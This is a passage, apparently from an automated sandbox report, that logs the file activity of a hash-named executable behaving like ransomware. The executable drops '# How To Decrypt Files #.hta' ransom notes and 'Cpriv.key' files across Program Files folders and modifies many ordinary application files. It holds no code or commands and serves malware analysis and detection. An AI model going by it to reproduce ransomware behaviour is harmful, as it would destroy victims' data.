Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00686_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vimeo.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\msado21.tlb de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00633_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Uninstall Information\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\orb.idl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\RSSFeeds.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Manuscript.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\ExecutiveNewsletter.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105232.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200611.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\uarrow.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00414_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\FORMS\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveDocumentReview\InactiveTabImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00483_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\WINWORD_K_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00068_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02886_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00563_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\STS2\header.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_bottom_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_TW.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\system.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmticmlr.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VBA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME05.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.CN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\settings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.core_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ach\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TextConv\Wks9Pxy.cnv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099163.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00910_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME52.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00174_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_ContactLow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\THROAT.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BabyBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00833_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME34.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106222.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172035.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Garden.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SHOVEL.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCAL.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_120.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\cs.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\THOCR.PSP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02278_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ModifiedTelespace.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\WEBHED98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Outlook.en-us\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\te.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00704_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\MSB1CACH.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\fonts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\SmallLogoBeta.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\slideShow.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\RICEPAPR.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLADDR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_pressed.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\winamp2.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15061_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_right_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-back-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02845G.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107314.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099199.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02009_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\DOCL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\Hx.HxT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di_1.0.0.v20140328-2112.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00238_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Components\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sr-Latn-CS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Excel.en-us\SETUP.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\SDK\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Welcome Tool\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePageScript.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Cpriv.key 